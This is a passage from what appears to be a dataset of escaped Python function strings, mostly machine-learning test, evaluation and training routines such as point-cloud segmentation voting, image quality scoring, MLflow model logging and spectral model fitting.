io_utils.normalize_list(normal_data, mutant_data, bias=0.1)\r\n print('data loaded')\r\n\r\n maxlen = io_utils.get_max_length(normal_data, mutant_data)\r\n print('maxlen: ' + str(maxlen))\r\n split_percentage = 4.0 / 5.0\r\n batch_size = 64\r\n\r\n X_normal_train, X_normal_test = io_utils.splitData_by_random(normal_data, split_percentage)\r\n X_mutant_train, X_mutant_test = io_utils.splitData_by_random(mutant_data, split_percentage)\r\n\r\n F_normal_train, F_normal_test = io_utils.splitData_by_random(normalfile, split_percentage)\r\n F_mutant_train, F_mutant_test = io_utils.splitData_by_random(mutantfile, split_percentage)\r\n\r\n # transform the list to same sequence length\r\n X_normal_test = sequence.pad_sequences(X_normal_test, maxlen=maxlen, dtype='float64', padding='post',\r\n truncating='post')\r\n X_mutant_test = sequence.pad_sequences(X_mutant_test, maxlen=maxlen, dtype='float64', padding='post',\r\n truncating='post')\r\n\r\n # load model\r\n if os.path.exists(lstm.model_path(modelrootdir, tag=tag)):\r\n print('loading model...')\r\n model = load_model(lstm.model_path(modelrootdir, tag=tag))\r\n model.summary()\r\n else:\r\n print('model ' + lstm.model_path(modelrootdir, tag=tag) + ' not found')\r\n return\r\n\r\n test(model, X_normal_test, 
X_mutant_test, batch_size=batch_size, normal=normal, mutant=mutant,\r\n F_normal_test=F_normal_test, F_mutant_test=F_mutant_test, savedir=os.path.join(resultrootdir, tag))\r\n\r\n # diff(model, normal_data, mutant_data, batch_size, normalfile, mutantfile,\r\n # os.path.join(resultrootdir,tag,normal), os.path.join(resultrootdir,tag,mutant),maxlen)\r\n\r\n # get output of intermediate layer\r\n normal_data = sequence.pad_sequences(normal_data, maxlen=maxlen, dtype='float64', truncating='post',\r\n padding='post')\r\n mutant_data = sequence.pad_sequences(mutant_data, maxlen=maxlen, dtype='float64', truncating='post',\r\n padding='post')\r\n \r\n write_intermediate_output(model, normal_data, mutant_data, batch_size, normalfile, mutantfile,\r\n os.path.join(resultrootdir, tag, normal), os.path.join(resultrootdir, tag, mutant),\r\n timesteps=maxlen, savebinary=savebinary)\r\n\r\n except:\r\n traceback_error = traceback.format_exc()\r\n print('traceback:' + str(traceback_error))\r\n print('[fail]')\r\n sys.exit(1)\r\n\r\n print('[success]')", "def run_all_models(self):\n #self.process_nitrate()\n try:\n sur_df = self.store.get('/said/{}/iv'.format(self.site['id']))\n con_df = self.store.get('/said/{}/qwdata'.format(self.site['id']))\n\n except KeyError:\n print('site {} not found'.format(site['name']))\n\n\n #determine start and end for plots\n start_date, end_date = get_time_limit(sur_df, con_df)\n\n #update start and end according to user\n user_start = self.site.get('start')\n user_end = self.site.get('end')\n\n if user_start:\n start_date = pd.to_datetime(user_start)\n\n if user_end:\n end_date = pd.to_datetime(user_end)\n\n\n #plot_ssc(ssc_model, filename='plots/{}_ssc.png'.format(site['name']),\n # start_date=start_date, end_date=end_date)\n\n #append the model results to summary\n #summary_table= summary_table.append(model_row_summary(ssc_model))\n\n for directory in ['model_data','report']:\n try:\n os.stat(directory)\n except:\n os.mkdir(directory)\n\n #pp_model_list = import pdb; pdb.set_trace()[\n # ['log(PP)',['log(Turb_HACH)']],\n # ['log(PP)',['log(Turb_YSI)']]\n #]\n\n #self.run_model(pp_model_list, 'PP')\n\n no3_model_list = [\n ['Nitrate',['NitrateSurr']],\n ]\n self.run_model(no3_model_list, 'Nitrate')\n\n ssc_model_list = [\n ['log(SSC)',['log(Turb_HACH)']],\n ['log(SSC)',['log(Turb_YSI)']]\n ]\n self.run_model(ssc_model_list, 'SSC')\n\n tp_model_list = [\n ['log(TP)',['log(OrthoP)','log(Turb_HACH)']],\n ['log(TP)',['log(OrthoP)','log(Turb_YSI)']],\n ['log(TP)',['log(Turb_HACH)']],\n ['log(TP)',['log(Turb_YSI)']]\n ]\n self.run_model(tp_model_list, 'TP')\n\n #write ssc model report\n #reportfile = 'report/{}_ssc_report.txt'.format(site['name'])\n #with open(reportfile, 'w') as f:\n # f.write(ssc_model.get_model_report().as_text())\n #summary_table= summary_table.append(model_row_summary(p_model1))\n #summary_table= summary_table.append(model_row_summary(p_model2))\n #plot_model(ssc_model, filename='plots/{}_ssc_model.png'.format(site['name']))\n #plot_phos(p_model1, p_model2, filename='plots/{}_tp.png'.format(site['name']),\n # start_date=start_date, end_date=end_date)\n #plot_model(p_model1, filename='plots/{}_orthoP_model.png'.format(site['name']))\n #\n ## try to plot phosphate\n #try:\n # phos_plot(con_data, sur_data, filename='plots/{}_p.png'.format(site['name']), title=site['name'],\n # return_model=True)\n #except:\n # print('phospate plot didnt work')\n #\n self.summary_table.to_csv('report/{}_model_summary.csv'.format(self.site['name']),\n index=False)", "def 
slam_segmentation_test(self, net, test_loader, config, num_votes=100, debug=True):\n\n ############\n # Initialize\n ############\n\n # Choose validation smoothing parameter (0 for no smothing, 0.99 for big smoothing)\n test_smooth = 0.5\n last_min = -0.5\n softmax = torch.nn.Softmax(1)\n\n # Number of classes including ignored labels\n nc_tot = test_loader.dataset.num_classes\n nc_model = net.C\n\n # Test saving path\n test_path = None\n report_path = None\n if config.saving:\n test_path = join('test', config.saving_path.split('/')[-1])\n if not exists(test_path):\n makedirs(test_path)\n report_path = join(test_path, 'reports')\n if not exists(report_path):\n makedirs(report_path)\n\n if test_loader.dataset.set == 'validation':\n for folder in ['val_predictions', 'val_probs']:\n if not exists(join(test_path, folder)):\n makedirs(join(test_path, folder))\n else:\n for folder in ['predictions', 'probs']:\n if not exists(join(test_path, folder)):\n makedirs(join(test_path, folder))\n\n # Init validation container\n all_f_preds = []\n all_f_labels = []\n if test_loader.dataset.set == 'validation':\n for i, seq_frames in enumerate(test_loader.dataset.frames):\n all_f_preds.append([np.zeros((0,), dtype=np.int32) for _ in seq_frames])\n all_f_labels.append([np.zeros((0,), dtype=np.int32) for _ in seq_frames])\n\n #####################\n # Network predictions\n #####################\n\n predictions = []\n targets = []\n test_epoch = 0\n\n t = [time.time()]\n last_display = time.time()\n mean_dt = np.zeros(1)\n\n # Start test loop\n while True:\n print('Initialize workers')\n for i, batch in enumerate(test_loader):\n\n # New time\n t = t[-1:]\n t += [time.time()]\n\n if i == 0:\n print('Done in {:.1f}s'.format(t[1] - t[0]))\n\n if 'cuda' in self.device.type:\n batch.to(self.device)\n\n # Forward pass\n outputs = net(batch, config)\n\n # Get probs and labels\n stk_probs = softmax(outputs).cpu().detach().numpy()\n lengths = batch.lengths[0].cpu().numpy()\n f_inds = batch.frame_inds.cpu().numpy()\n r_inds_list = batch.reproj_inds\n r_mask_list = batch.reproj_masks\n labels_list = batch.val_labels\n torch.cuda.synchronize(self.device)\n\n t += [time.time()]\n\n # Get predictions and labels per instance\n # ***************************************\n\n i0 = 0\n for b_i, length in enumerate(lengths):\n\n # Get prediction\n probs = stk_probs[i0:i0 + length]\n proj_inds = r_inds_list[b_i]\n proj_mask = r_mask_list[b_i]\n frame_labels = labels_list[b_i]\n s_ind = f_inds[b_i, 0]\n f_ind = f_inds[b_i, 1]\n\n # Project predictions on the frame points\n proj_probs = probs[proj_inds]\n\n # Safe check if only one point:\n if proj_probs.ndim < 2:\n proj_probs = np.expand_dims(proj_probs, 0)\n\n # Save probs in a binary file (uint8 format for lighter weight)\n seq_name = test_loader.dataset.sequences[s_ind]\n if test_loader.dataset.set == 'validation':\n folder = 'val_probs'\n pred_folder = 'val_predictions'\n else:\n folder = 'probs'\n pred_folder = 'predictions'\n filename = '{:s}_{:07d}.npy'.format(seq_name, f_ind)\n filepath = join(test_path, folder, filename)\n if exists(filepath):\n frame_probs_uint8 = np.load(filepath)\n else:\n frame_probs_uint8 = np.zeros((proj_mask.shape[0], nc_model), dtype=np.uint8)\n frame_probs = frame_probs_uint8[proj_mask, :].astype(np.float32) / 255\n frame_probs = test_smooth * frame_probs + (1 - test_smooth) * proj_probs\n frame_probs_uint8[proj_mask, :] = (frame_probs * 255).astype(np.uint8)\n np.save(filepath, frame_probs_uint8)\n\n # Save some prediction in ply format for 
visual\n if test_loader.dataset.set == 'validation':\n\n # Insert false columns for ignored labels\n frame_probs_uint8_bis = frame_probs_uint8.copy()\n for l_ind, label_value in enumerate(test_loader.dataset.label_values):\n if label_value in test_loader.dataset.ignored_labels:\n frame_probs_uint8_bis = np.insert(frame_probs_uint8_bis, l_ind, 0, axis=1)\n\n # Predicted labels\n frame_preds = test_loader.dataset.label_values[np.argmax(frame_probs_uint8_bis,\n axis=1)].astype(np.int32)\n\n # Save some of the frame pots\n if f_ind % 20 == 0:\n seq_path = join(test_loader.dataset.path, 'sequences', test_loader.dataset.sequences[s_ind])\n velo_file = join(seq_path, 'velodyne', test_loader.dataset.frames[s_ind][f_ind] + '.bin')\n frame_points = np.fromfile(velo_file, dtype=np.float32)\n frame_points = frame_points.reshape((-1, 4))\n predpath = join(test_path, pred_folder, filename[:-4] + '.ply')\n #pots = test_loader.dataset.f_potentials[s_ind][f_ind]\n pots = np.zeros((0,))\n if pots.shape[0] > 0:\n write_ply(predpath,\n [frame_points[:, :3], frame_labels, frame_preds, pots],\n ['x', 'y', 'z', 'gt', 'pre', 'pots'])\n else:\n write_ply(predpath,\n [frame_points[:, :3], frame_labels, frame_preds],\n ['x', 'y', 'z', 'gt', 'pre'])\n\n # Also Save lbl probabilities\n probpath = join(test_path, folder, filename[:-4] + '_probs.ply')\n lbl_names = [test_loader.dataset.label_to_names[l]\n for l in test_loader.dataset.label_values\n if l not in test_loader.dataset.ignored_labels]\n write_ply(probpath,\n [frame_points[:, :3], frame_probs_uint8],\n ['x', 'y', 'z'] + lbl_names)\n\n # keep frame preds in memory\n all_f_preds[s_ind][f_ind] = frame_preds\n all_f_labels[s_ind][f_ind] = frame_labels\n\n else:\n\n # Save some of the frame preds\n if f_inds[b_i, 1] % 100 == 0:\n\n # Insert false columns for ignored labels\n for l_ind, label_value in enumerate(test_loader.dataset.label_values):\n if label_value in test_loader.dataset.ignored_labels:\n frame_probs_uint8 = np.insert(frame_probs_uint8, l_ind, 0, axis=1)\n\n # Predicted labels\n frame_preds = test_loader.dataset.label_values[np.argmax(frame_probs_uint8,\n axis=1)].astype(np.int32)\n\n # Load points\n seq_path = join(test_loader.dataset.path, 'sequences', test_loader.dataset.sequences[s_ind])\n velo_file = join(seq_path, 'velodyne', test_loader.dataset.frames[s_ind][f_ind] + '.bin')\n frame_points = np.fromfile(velo_file, dtype=np.float32)\n frame_points = frame_points.reshape((-1, 4))\n predpath = join(test_path, pred_folder, filename[:-4] + '.ply')\n #pots = test_loader.dataset.f_potentials[s_ind][f_ind]\n pots = np.zeros((0,))\n if pots.shape[0] > 0:\n write_ply(predpath,\n [frame_points[:, :3], frame_preds, pots],\n ['x', 'y', 'z', 'pre', 'pots'])\n else:\n write_ply(predpath,\n [frame_points[:, :3], frame_preds],\n ['x', 'y', 'z', 'pre'])\n\n # Stack all prediction for this epoch\n i0 += length\n\n # Average timing\n t += [time.time()]\n mean_dt = 0.95 * mean_dt + 0.05 * (np.array(t[1:]) - np.array(t[:-1]))\n\n # Display\n if (t[-1] - last_display) > 1.0:\n last_display = t[-1]\n message = 'e{:03d}-i{:04d} => {:.1f}% (timings : {:4.2f} {:4.2f} {:4.2f}) / pots {:d} => {:.1f}%'\n min_pot = int(torch.floor(torch.min(test_loader.dataset.potentials)))\n pot_num = torch.sum(test_loader.dataset.potentials > min_pot + 0.5).type(torch.int32).item()\n current_num = pot_num + (i + 1 - config.validation_size) * config.val_batch_num\n print(message.format(test_epoch, i,\n 100 * i / config.validation_size,\n 1000 * (mean_dt[0]),\n 1000 * (mean_dt[1]),\n 1000 * 
(mean_dt[2]),\n min_pot,\n 100.0 * current_num / len(test_loader.dataset.potentials)))\n\n\n # Update minimum od potentials\n new_min = torch.min(test_loader.dataset.potentials)\n print('Test epoch {:d}, end. Min potential = {:.1f}'.format(test_epoch, new_min))\n\n if last_min + 1 < new_min:\n\n # Update last_min\n last_min += 1\n\n if test_loader.dataset.set == 'validation' and last_min % 1 == 0:\n\n #####################################\n # Results on the whole validation set\n #####################################\n\n # Confusions for our subparts of validation set\n Confs = np.zeros((len(predictions), nc_tot, nc_tot), dtype=np.int32)\n for i, (preds, truth) in enumerate(zip(predictions, targets)):\n\n # Confusions\n Confs[i, :, :] = fast_confusion(truth, preds, test_loader.dataset.label_values).astype(np.int32)\n\n\n # Show vote results\n print('\\nCompute confusion')\n\n val_preds = []\n val_labels = []\n t1 = time.time()\n for i, seq_frames in enumerate(test_loader.dataset.frames):\n val_preds += [np.hstack(all_f_preds[i])]\n val_labels += [np.hstack(all_f_labels[i])]\n val_preds = np.hstack(val_preds)\n val_labels = np.hstack(val_labels)\n t2 = time.time()\n C_tot = fast_confusion(val_labels, val_preds, test_loader.dataset.label_values)\n t3 = time.time()\n print(' Stacking time : {:.1f}s'.format(t2 - t1))\n print('Confusion time : {:.1f}s'.format(t3 - t2))\n\n s1 = '\\n'\n for cc in C_tot:\n for c in cc:\n s1 += '{:7.0f} '.format(c)\n s1 += '\\n'\n if debug:\n print(s1)\n\n # Remove ignored labels from confusions\n for l_ind, label_value in reversed(list(enumerate(test_loader.dataset.label_values))):\n if label_value in test_loader.dataset.ignored_labels:\n C_tot = np.delete(C_tot, l_ind, axis=0)\n C_tot = np.delete(C_tot, l_ind, axis=1)\n\n # Objects IoU\n val_IoUs = IoU_from_confusions(C_tot)\n\n # Compute IoUs\n mIoU = np.mean(val_IoUs)\n s2 = '{:5.2f} | '.format(100 * mIoU)\n for IoU in val_IoUs:\n s2 += '{:5.2f} '.format(100 * IoU)\n print(s2 + '\\n')\n\n # Save a report\n report_file = join(report_path, 'report_{:04d}.txt'.format(int(np.floor(last_min))))\n str = 'Report of the confusion and metrics\\n'\n str += '***********************************\\n\\n\\n'\n str += 'Confusion matrix:\\n\\n'\n str += s1\n str += '\\nIoU values:\\n\\n'\n str += s2\n str += '\\n\\n'\n with open(report_file, 'w') as f:\n f.write(str)\n\n test_epoch += 1\n\n # Break when reaching number of desired votes\n if last_min > num_votes:\n break\n\n return", "def test_full(args, model, device): \n test_path = '../data/full/original/'\n generate_path = '../data/full/generate/'\n test_image_num = len([name for name in os.listdir(test_path)\n if os.path.isfile(os.path.join(test_path, name))])\n\n score_psnr, score_ssim_skimage, score_ssim_minstar, score_msssim_minstar = 0.0, 0.0, 0.0, 0.0\n ind = 0\n for name in os.listdir(test_path):\n if os.path.isfile(os.path.join(test_path, name)):\n ind += 1\n test_original, test_style, image_height, image_width = load_test_dataset(name)\n x = torch.from_numpy(test_original).float()\n y_real = torch.from_numpy(test_style).float()\n x = x.view(image_height, image_width, config.channels).permute(2, 0, 1).to(device)\n y_real = y_real.view(image_height, image_width, config.channels).permute(2, 0, 1).to(device)\n \n y_fake = model.gen_g(x.view(-1, config.channels, image_height, image_width))\n y_fake = y_fake.view(config.channels, image_height, image_width)\n \n # Calculate PSNR & SSIM scores\n score_psnr += psnr_full(y_fake, y_real)\n \n y_fake_np = 
y_fake.detach().cpu().numpy().transpose(1, 2, 0)\n y_real_np = y_real.cpu().numpy().transpose(1, 2, 0)\n temp_ssim, _ = compare_ssim(y_fake_np, y_real_np, multichannel=True, gaussian_weights=True, full=True)\n score_ssim_skimage += temp_ssim\n \n temp_ssim, _ = ssim(y_fake, y_real, kernel_size=11, kernel_sigma=1.5)\n score_ssim_minstar += temp_ssim\n \n score_msssim_minstar += multi_scale_ssim(y_fake, y_real, kernel_size=11, kernel_sigma=1.5)\n print('PSNR & SSIM scores of {} images are calculated.'.format(ind))\n \n utils.save_image(y_fake, os.path.join(generate_path, '{}-x.jpg'.format(name[:5] + args.model_type)))\n\n score_psnr /= test_image_num\n score_ssim_skimage /= test_image_num\n score_ssim_minstar /= test_image_num\n score_msssim_minstar /= test_image_num\n print('PSNR : {:.4f}, SSIM_skimage : {:.4f}, SSIM_minstar : {:.4f}, SSIM_msssim: {:.4f}'.format(\n score_psnr, score_ssim_skimage, score_ssim_minstar, score_msssim_minstar))", "def test_model_found(arguments):\n ...", "def test_model_runs(self):\n batch = _get_vertex_model_batch()\n pred_dist = self.model(batch, is_training=False)\n logits = pred_dist.logits\n with self.session() as sess:\n sess.run(tf.global_variables_initializer())\n vertices_flat = np.random.randint(\n 2**_QUANTIZATION_BITS + 1,\n size=[_BATCH_SIZE, _NUM_INPUT_VERTS * 3 + 1])\n sess.run(logits, {batch['vertices_flat']: vertices_flat})", "def test_067_normalised_loser_only(self):\n\n def create_model_fn(fn_team: str):\n team_stat = Stats.n_sample_stats_for_team(cursor=db_in_cursor,\n team=fn_team,\n last_sample_date=self.model_date,\n n_samples=self.num_samples,\n normalize_by_matches=False)\n return FeatureModel(input_data=team_stat,\n id=team_stat.team_name,\n feature_model_making_fn=lambda stat: (-1 * stat.lost) / stat.played\n )\n\n for match_date in played_home_OR_away_before_dates:\n ####\n #  Build model up to the day before the match\n ####\n self.model_date = match_date - timedelta(days=1)\n self.num_samples = num_matches_in_season\n\n models: {str: FeatureModel} = FeatureModel.create_models_for_all_teams(\n model_making_fn=create_model_fn, entities=teams)\n\n self.persist_models(model_gen_date=self.model_date, model_description=self.shortDescription(), models=models)\n\n self.make_and_store_predictions_for_date(match_date=match_date, models=models)", "def run_tests():\n source1 = TextModel('hilary_speaches')\n source1.add_file('hilary_source_text.txt')\n\n source2 = TextModel('bernie_speaches')\n source2.add_file('bernie_source_text.txt')\n\n new1 = TextModel('trump_speach')\n new1.add_file('trump_text.txt')\n new1.classify(source1, source2)\n\n new2 = TextModel('hilary_test')\n new2.add_file('hilary_test.txt')\n new2.classify(source1, source2)\n\n new3 = TextModel('bernie_test')\n new3.add_file('bernie_test.txt')\n new3.classify(source1, source2)\n\n new4 = TextModel('bill_clinton_test')\n new4.add_file('bill_clinton_source.txt')\n new4.classify(source1, source2)", "def test_classify_spectra2():\n\n import numpy as np\n from crpm.setup_spectra2 import setup_spectra2\n from crpm.dynamics import computecost\n from crpm.gradientdecent import gradientdecent\n from crpm.analyzebinaryclassifier import analyzebinaryclassifier\n\n #init numpy seed\n np.random.seed(40017)\n\n #setup model\n discriminator, data = setup_spectra2()\n\n #partition data (labels on first row)\n nobv = data.shape[1]\n cutoff = 2*nobv//3\n target = data[0, :cutoff]\n train = data[1:, :cutoff]\n vtarget = data[0, cutoff:]\n valid = data[1:, cutoff:]\n\n #analyze untrained 
discriminator\n pred, icost = computecost(discriminator, valid, vtarget, \"bce\")\n roc, ireport = analyzebinaryclassifier(pred, vtarget)\n if ireport[\"AreaUnderCurve\"]<.5:\n #flip labels\n pred, icost = computecost(discriminator, valid, 1-vtarget, \"bce\")\n roc, ireport = analyzebinaryclassifier(pred, 1-vtarget)\n print(ireport)\n #plotroc(roc)\n\n #train discriminator\n pred, cost, _ = gradientdecent(discriminator, train, target, \"bce\",\n valid, vtarget,\n earlystop=True,\n finetune=7)\n\n #analyze discriminator\n print(\"analyze trained discriminator to iden subtype\")\n pred, cost = computecost(discriminator, valid, vtarget, \"bce\")\n roc, report = analyzebinaryclassifier(pred, vtarget)\n if report[\"AreaUnderCurve\"]<.5:\n #flip labels\n pred, cost = computecost(discriminator, valid, 1-vtarget, \"bce\")\n roc, report = analyzebinaryclassifier(pred, 1-vtarget)\n print(report)\n #plotroc(roc)\n\n #assert discriminator can be trained by binary cross entropy error\n assert icost > cost\n assert report[\"AreaUnderCurve\"] > ireport[\"AreaUnderCurve\"]\n assert report[\"AreaUnderCurve\"] > .8", "def test_01_train(self):\n today = date.today()\n log_file = os.path.join(LOG_DIR, \"{}-train-{}-{}.log\".format(LOG_PREFIX, today.year, today.month))\n if os.path.exists(log_file):\n os.remove(log_file)\n \n ## update the log\n country = 'india'\n date_range = ('2017-11-29', '2019-05-24')\n metric = {'rmse':0.5}\n runtime = \"00:00:01\"\n model_version = 0.1\n model_version_note = \"test model\"\n \n update_train_log(country, date_range, metric, runtime,\n model_version, model_version_note, test=True, prefix=LOG_PREFIX)\n\n self.assertTrue(os.path.exists(log_file))", "def test(model: LightningModule, datamodule: LightningDataModule,\n logger: LightningLoggerBase, name: str = None,\n config: DictConfig = None, path: str = None):\n\n test_dataloader = datamodule.test_dataloader()\n test_result, predictions = test_model(model, model.criterion, test_dataloader)\n logger.log_metrics(format_result(test_result, name))\n predictions.to_csv(f\"{path}/{f'{name}_' if name else ''}preds.csv\", index=False)\n\n if config.get('test'):\n if config.test.get('corruptions'):\n c_config = config.test.corruptions\n\n sum_acc = 0\n for s in c_config.severities:\n for c in c_config.corruptions:\n dataset = SingleCurruptionDataloader(\n datamodule.data_c_test,\n c,\n s,\n c_config.folder_name,\n transform=datamodule.test_transforms,\n dataset_path=c_config.dataset_path)\n\n dataloader = DataLoader(\n dataset=dataset,\n batch_size=datamodule.batch_size,\n num_workers=datamodule.num_workers,\n pin_memory=datamodule.pin_memory,\n shuffle=False,\n )\n\n c_result, c_predictions = test_model(model, model.criterion, dataloader)\n sum_acc += c_result[0]['test/acc']\n logger.log_metrics(format_result(c_result, f'{name}_{c}_{str(s)}' if name else f'{c}_{str(s)}'))\n c_predictions.to_csv(f\"{path}/{f'{name}_' if name else ''}{c}_{str(s)}_preds.csv\", index=False)\n\n acc = sum_acc / (len(c_config.corruptions) * len(c_config.severities))\n logger.log_metrics({f'{name}_c_test/acc' if name else 'c_test/acc': acc})\n\n if config.test.get('ood'):\n ood_datamodule = instantiate(config.ood)\n ood_datamodule.prepare_data()\n ood_datamodule.setup()\n ood_test = ood_datamodule.test_dataloader()\n\n ood_result, ood_predictions = test_model(model, model.criterion, ood_test)\n logger.log_metrics(format_result(ood_result, f'{name}_ood' if name else 'ood'))\n ood_predictions.to_csv(f\"{path}/{f'{name}_' if name else ''}ood_preds.csv\", 
index=False)\n\n # TODO: return metrics\n return None", "def test_mock_spec():\n\n # try fitting a mock spectrum which you know has a match in the model grid\n lam_obs, flam_obs, ferr_obs, mock_lsf = get_mock_spec()\n\n # read in entire model set\n bc03_all_spec = fits.open(figs_dir + 'all_comp_spectra_bc03_ssp_and_csp_nolsf_noresample.fits')\n\n # prep for fitting\n total_models = 34542 # if ssp + csp\n\n # arrange the model spectra to be compared in a properly shaped numpy array for faster computation\n # first check where the models are\n model_dir = '/Volumes/Bhavins_backup/bc03_models_npy_spectra/m62/'\n # this is if working on the laptop. Then you must be using the external hard drive where the models are saved.\n if not os.path.isdir(model_dir):\n model_dir = home + '/Documents/GALAXEV_BC03/bc03/src/cspout_new/m62/' # this path only exists on firstlight\n if not os.path.isdir(model_dir):\n print \"Model files not found. Exiting...\"\n sys.exit(0)\n\n example_filename_lamgrid = 'bc2003_hr_m62_tauV0_csp_tau100_salp_lamgrid.npy'\n model_lam_grid = np.load(model_dir + example_filename_lamgrid)\n model_comp_spec = np.zeros([total_models, len(model_lam_grid)], dtype=np.float64)\n for j in range(total_models):\n model_comp_spec[j] = bc03_all_spec[j+1].data\n\n # total run time up to now\n print \"All models put in numpy array. Total time taken up to now --\", time.time() - start, \"seconds.\"\n\n # now call the actual fitting function\n mock_redshift_estimate = 1.0 # this behaves like the photo-z\n\n # extend lam_grid to be able to move the lam_grid later \n avg_dlam = old_ref.get_avg_dlam(lam_obs)\n\n lam_low_to_insert = np.arange(5000, lam_obs[0], avg_dlam)\n lam_high_to_append = np.arange(lam_obs[-1] + avg_dlam, 10500, avg_dlam)\n\n resampling_lam_grid = np.insert(lam_obs, obj=0, values=lam_low_to_insert)\n resampling_lam_grid = np.append(resampling_lam_grid, lam_high_to_append)\n\n # call actual fitting function\n do_fitting(flam_obs, ferr_obs, lam_obs, mock_lsf, mock_redshift_estimate, resampling_lam_grid, \\\n model_lam_grid, total_models, model_comp_spec, bc03_all_spec)\n\n # total time\n print \"Total time taken up to now --\", time.time() - start, \"seconds.\"\n sys.exit(0)\n\n return None", "def test_log_model(auto_arima_model, tmp_path, should_start_run, serialization_format):\n try:\n if should_start_run:\n mlflow.start_run()\n artifact_path = \"sktime\"\n conda_env = tmp_path.joinpath(\"conda_env.yaml\")\n _mlflow_conda_env(conda_env, additional_pip_deps=[\"sktime\"])\n model_info = flavor.log_model(\n sktime_model=auto_arima_model,\n artifact_path=artifact_path,\n conda_env=str(conda_env),\n serialization_format=serialization_format,\n )\n model_uri = f\"runs:/{mlflow.active_run().info.run_id}/{artifact_path}\"\n assert model_info.model_uri == model_uri\n reloaded_model = flavor.load_model(\n model_uri=model_uri,\n )\n np.testing.assert_array_equal(auto_arima_model.predict(), reloaded_model.predict())\n model_path = Path(_download_artifact_from_uri(artifact_uri=model_uri))\n model_config = Model.load(str(model_path.joinpath(\"MLmodel\")))\n assert pyfunc.FLAVOR_NAME in model_config.flavors\n finally:\n mlflow.end_run()", "def train_nn_scaled(image, spectra, n_rep=500, n_epochs=30000, lr=1e-3, added_dE1=0.3, path_to_models=\"models\",\n display_step=1000):\n \"\"\"\n if hasattr(image, \"name\"):\n path_to_models = image.name + \"_\" + path_to_models\n\n if not os.path.exists(path_to_models):\n Path(path_to_models).mkdir(parents=True, exist_ok=True)\n else:\n ans = input(\"The 
directory \" + path_to_models + \" already exists, if there are trained models \" +\n \"in this folder, they will be overwritten. Do you want to continue? \\n\"+\n \"yes [y], no [n], define new path[dp]\\n\")\n if ans[0] == 'n':\n return\n elif not ans[0] == 'y':\n path_to_models = input(\"Please define the new path: \\n\")\n \"\"\"\n\n print(spectra.shape)\n sys.exit()\n\n if display_step is None:\n print_progress = False\n display_step = 1E6\n else:\n print_progress = True\n\n\n loss_test_reps = np.zeros(n_rep)\n n_data = image.l\n\n # data_sigma = np.zeros((n_data,1))\n # sigma_clusters = np.zeros((image.n_clusters, image.l))\n # for cluster in range(image.n_clusters):\n # ci_low = np.nanpercentile(np.log(spectra[cluster]), 16, axis=0)\n # ci_high = np.nanpercentile(np.log(spectra[cluster]), 84, axis=0)\n # sigma_clusters[cluster, :] = np.absolute(ci_high - ci_low)\n # data_sigma[cluster*image.l : (cluster+1)*image.l,0] = np.absolute(ci_high-ci_low)\n\n # new??? #TODO: verplaats dit naar determine_dE1\n wl1 = round(image.l / 20)\n wl2 = wl1 * 2\n units_per_bin = 4\n nbins = round(image.l / units_per_bin) # 150\n spectra_smooth = smooth_clusters(image, spectra, wl1)\n dy_dx = derivative_clusters(image, spectra_smooth)\n smooth_dy_dx = smooth_clusters(image, dy_dx, wl2)\n # dE1s = find_clusters_dE1(image, smooth_dy_dx, spectra_smooth)\n\n dE1 = determine_dE1_new(image, smooth_dy_dx, spectra_smooth) * added_dE1 # dE1s, dy_dx)\n # image.dE1 = dE1\n\n # TODO: instead of the binned statistics, just use xth value to dischart -> neh says Juan\n times_dE1 = 3\n min_dE2 = image.deltaE.max() - image.ddeltaE * image.l * 0.05 # at least 5% zeros at end\n dE2 = np.minimum(times_dE1 * dE1,\n min_dE2) # minimal 1eV at the end with zeros #determine_dE2_new(image, spectra_smooth, smooth_dy_dx)#[0], nbins, dE1)\n\n if print_progress: print(\"dE1 & dE2:\", np.round(dE1, 3), dE2)\n\n ab_deltaE = find_scale_var(image.deltaE)\n deltaE_scaled = scale(image.deltaE, ab_deltaE)\n\n # all_spectra = image.data\n # all_spectra[all_spectra<1] = 1\n # int_log_I = np.log(np.sum(all_spectra, axis=2)).flatten()\n\n all_spectra = np.empty((0, image.l))\n\n for i in range(len(spectra)):\n all_spectra = np.append(all_spectra, spectra[i], axis=0)\n\n int_log_I = np.log(np.sum(all_spectra, axis=1)).flatten()\n ab_int_log_I = find_scale_var(int_log_I)\n del all_spectra\n\n if not os.path.exists(path_to_models + \"scale_var.txt\"):\n np.savetxt(path_to_models + \"scale_var.txt\", ab_int_log_I)\n\n if not os.path.exists(path_to_models + \"dE1.txt\"):\n # np.savetxt(path_to_models+ \"/dE1\" + str(bs_rep_num) + \".txt\", dE1)\n np.savetxt(path_to_models + \"dE1.txt\", np.vstack((image.clusters, dE1)))\n\n\n for i in range(n_rep):\n if print_progress: print(\"Started training on replica number {}\".format(i) + \", at time \", dt.datetime.now())\n data = np.empty((0, 1))\n data_x = np.empty((0, 2))\n data_sigma = np.empty((0, 1))\n\n\n n_cluster = len(spectra[cluster])\n idx = random.randint(0, n_cluster - 1)\n # data[cluster*image.l : (cluster+1)*image.l,0] = np.log(spectra[cluster][idx])\n select1 = len(image.deltaE[image.deltaE < dE1[cluster]])\n select2 = len(image.deltaE[image.deltaE > dE2[cluster]])\n data = np.append(data, np.log(spectra[cluster][idx][:select1]))\n data = np.append(data, np.zeros(select2))\n\n pseudo_x = np.ones((select1 + select2, 2))\n pseudo_x[:select1, 0] = deltaE_scaled[:select1]\n pseudo_x[-select2:, 0] = deltaE_scaled[-select2:]\n int_log_I_idx_scaled = scale(np.log(np.sum(spectra[cluster][idx])), 
ab_int_log_I)\n pseudo_x[:, 1] = int_log_I_idx_scaled\n\n data_x = np.concatenate((data_x, pseudo_x)) # np.append(data_x, pseudo_x)\n\n data_sigma = np.append(data_sigma, sigma_clusters[cluster][:select1])\n data_sigma = np.append(data_sigma, 0.8 * np.ones(select2))\n\n model = MLP(num_inputs=1, num_outputs=1)\n model.apply(weight_reset)\n # optimizer = optim.RMSprop(model.parameters(), lr=6 * 1e-3, eps=1e-5, momentum=0.0, alpha = 0.9)\n optimizer = optim.Adam(model.parameters(), lr=lr)\n\n\n train_x, test_x, train_y, test_y, train_sigma, test_sigma = train_test_split(data_x, data, data_sigma,\n test_size=0.4)\n\n N_test = len(test_x)\n N_train = len(train_x)\n\n test_x = test_x.reshape(N_test, 2)\n test_y = test_y.reshape(N_test, 1)\n train_x = train_x.reshape(N_train, 2)\n train_y = train_y.reshape(N_train, 1)\n train_sigma = train_sigma.reshape(N_train, 1)\n test_sigma = test_sigma.reshape(N_test, 1)\n\n train_x = torch.from_numpy(train_x)\n train_y = torch.from_numpy(train_y)\n train_sigma = 